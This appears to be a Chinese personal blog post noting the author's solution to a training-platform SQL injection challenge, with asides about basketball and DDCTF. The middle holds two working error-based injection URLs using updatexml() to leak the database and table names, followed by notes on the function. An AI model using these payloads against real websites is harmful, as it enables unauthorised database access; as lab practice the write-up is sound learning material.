嗯哼，这几天篮球比赛，天天训练，学习都耽搁了，DDCTF做了一会心态就爆炸了，蓝瘦，明天再打一场，希望能赢呢，打完就疯狂继续学习了。今天抽空又做了一些基本的SQL注入题目，墨者学院的一道报错注入的题目，很基础。并且没过滤啥，所以直接肝就完事了。我一开始用了SQLMAP就直接跑了，然后还是锻炼一下手注把。

首先，还是那个页面(最近又用起了火狐，毕竟比Chrome 占用资源少，卡顿少)

然后加了一个'

很明显的报错注入把。那我就用我之前学到的一个updatexml函数来报错：

http://219.153.49.228:49249/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),3)%20%23

http://219.153.49.228:49249/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e，(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x73746f726d67726f7570),0x7e),3)%20%23

这是最基础的部分，就不讲解了。就做些笔记把。最后记得用limit限制行数。

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数：XML_document是String格式，为XML文档对象的名称。
第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。
第三个参数：new_value，String格式，替换查找到的符合条件的数据
--------------------- 摘自  https://blog.csdn.net/xingyyn78/article/details/79737070

顺便记一下substr函数是从1开始，而不是0

再上一篇用另外的方法进行的报错注入（笔记） https://blog.csdn.net/qq_41409656/article/details/79165873